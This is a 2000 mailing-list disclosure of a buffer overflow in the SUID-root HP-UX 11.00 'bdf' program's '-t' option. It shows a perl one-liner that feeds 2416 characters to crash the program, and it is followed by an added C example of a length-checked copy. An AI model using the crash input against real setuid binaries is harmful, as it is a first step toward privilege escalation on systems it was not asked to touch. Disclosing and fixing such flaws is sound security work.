Subject: [ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul.
From: Kyong-won Cho (dubhe@HACKERSLAB.COM)
Date: Thu Jul 27 2000 - 08:45:01 CDT
================================================================================
[ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul
================================================================================
File : /usr/bin/bdf
SYSTEM : HP-UX 11.00
Tested on HP-UX B.11.00
INFO :
bdf - report number of free disk blocks (Berkeley version)
    -t type    Report on the file systems of a given type (for
               example, nfs or hfs).
* The 'bdf' program has the SUID permission.
$ ls -la `which bdf`
-r-sr-xr-x 1 root bin 24576 Apr 7 1998 /usr/bin/bdf
* Using the '-t' option with a long character string
$ bdf -t `perl -e 'print "A"x2415'`
bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA..omitted...AAAAAAAAAAAAAAAA : No such file or directory
usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]
$ bdf -t `perl -e 'print "A"x2416'`
Memory fault
$
<bash environment>
bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`
Segmentation fault
bash-2.04$
***
If the argument is longer than 2415 characters, 'bdf' gets a segmentation fault.
Maybe 'bdf' does not check the string boundary.
SOLUTION
Don't know :)
==-------------------------------------------------------------------------------==
*********
* ** ** *
* ** ** *
* ******* *
* ** ** * dubhe@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
********* HACKERSLAB (C) since 2000
==-------------------------------------------------------------------------------==
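
Added example, not part of the original post and not bdf source code: a length-checked copy of an option argument into a fixed-size buffer, the kind of boundary check the report suspects is missing. The names set_fstype, try_length and FSTYPE_MAX and the 16-byte limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define FSTYPE_MAX 16  /* assumed bound: type names such as hfs or nfs are short */

/* Pattern the crash is consistent with (assumption, not bdf source):
 *     char type[SOME_SIZE];
 *     strcpy(type, optarg);    // length of optarg never checked
 */

/* Copy a -t argument into dst only if it fits, terminator included.
 * Over-long input is rejected, not truncated.
 * Returns 0 on success, -1 otherwise. */
int set_fstype(char *dst, size_t dstsize, const char *arg)
{
    size_t len = 0;

    if (dst == NULL || arg == NULL || dstsize == 0)
        return -1;
    while (len < dstsize && arg[len] != '\0')   /* never scans past dstsize bytes */
        len++;
    if (len == 0 || len >= dstsize)
        return -1;
    memcpy(dst, arg, len + 1);                  /* len + 1 <= dstsize */
    return 0;
}

/* Constructed input: n 'A' characters, like the perl one-liner in the report. */
int try_length(size_t n)
{
    static char arg[4096];
    char type[FSTYPE_MAX];

    if (n >= sizeof arg)
        return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return set_fstype(type, sizeof type, arg);
}

int main(void)
{
    size_t lens[] = { 3, 15, 16, 2415, 2416 };
    size_t i;

    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("%4lu bytes -> %s\n", (unsigned long)lens[i],
               try_length(lens[i]) == 0 ? "accepted" : "rejected");
    return 0;
}
```

A caller would print the usage message and exit when set_fstype returns -1, before the argument reaches any other buffer.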